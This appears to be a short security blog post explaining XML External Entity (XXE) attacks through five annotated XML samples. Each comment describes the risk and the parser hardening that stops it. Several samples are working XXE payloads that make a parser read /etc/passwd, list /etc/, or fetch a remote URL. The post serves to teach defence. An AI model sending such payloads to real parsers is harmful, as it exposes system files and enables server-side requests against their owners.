/security/

XML External Entity (XXE)

2018-01-07 20:29:04

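<?xml version="1.0"?>
<!-- Internal general entities: myName and mySurname are declared in the
     internal DTD subset and their replacement text is a literal string held
     in this document. After expansion, <text> contains "Michal Szalkowski".
     Nothing outside the document is read. The expansion happens only because
     the parser processes the DOCTYPE, so a parser configured to disallow
     DOCTYPE declarations (the usual setting for untrusted input) rejects
     this document. -->
<!DOCTYPE change-log [
    <!ENTITY myName "Michal">
    <!ENTITY mySurname "Szalkowski">
]>
<change-log>
    <text>&myName; &mySurname;</text>
</change-log>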

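<?xml version="1.0"?>
<!-- External general entity: the SYSTEM identifier is a URL instead of a
     literal string. A parser that resolves external entities fetches that URL
     from the machine doing the parsing and places the response inside <text>,
     so whoever supplies the document decides which request the parsing host
     makes. For untrusted input, configure the parser to disallow DOCTYPE
     declarations or to refuse external entity resolution. Inbound documents
     that carry a DOCTYPE with a SYSTEM or PUBLIC identifier are worth
     logging and rejecting. -->
<!DOCTYPE change-log [
    <!ENTITY systemEntity SYSTEM "http://example.com/feed/">
]>
<change-log>
    <text>&systemEntity;</text>
</change-log>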

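<?xml version="1.0"?>
<!-- External general entity with a relative system identifier. "robots.txt"
     is resolved against the base URI of the entity declaration, so what is
     actually read depends on where the parser believes this document came
     from (a directory on disk, or a URL). The effect is the same as with an
     absolute identifier: content chosen by the document author is pulled in
     by the parsing host. Disabling DTD processing or external entity
     resolution prevents the lookup. -->
<!DOCTYPE change-log [
    <!ENTITY systemEntity SYSTEM "robots.txt">
]>
<change-log>
    <text>&systemEntity;</text>
</change-log>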
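<?xml version="1.0"?>
<!-- External general entity whose system identifier is a local file path.
     A parser that resolves external entities reads the file with the
     privileges of the parsing process and substitutes its content into
     <text>. If the application then returns or stores the parsed value, the
     file content is disclosed to whoever supplied the document. This is why
     untrusted XML must be parsed with DOCTYPE declarations disallowed, or
     with external entity resolution switched off. -->
<!DOCTYPE change-log [
    <!ENTITY systemEntity SYSTEM "/etc/passwd">
]>
<change-log>
    <text>&systemEntity;</text>
</change-log>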
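<?xml version="1.0"?>
<!-- External general entity using an explicit file: URI that names a
     directory instead of a file. The system literal is single-quoted here,
     which XML treats the same as double quotes. What a resolver returns for
     a directory URI is implementation-specific, so this case should be
     covered when testing a parser's hardening. With DOCTYPE declarations
     disallowed or external entity resolution disabled, the reference is
     never dereferenced. -->
<!DOCTYPE change-log [
    <!ENTITY systemEntity SYSTEM 'file:///etc/'>
]>
<change-log>
    <text>&systemEntity;</text>
</change-log>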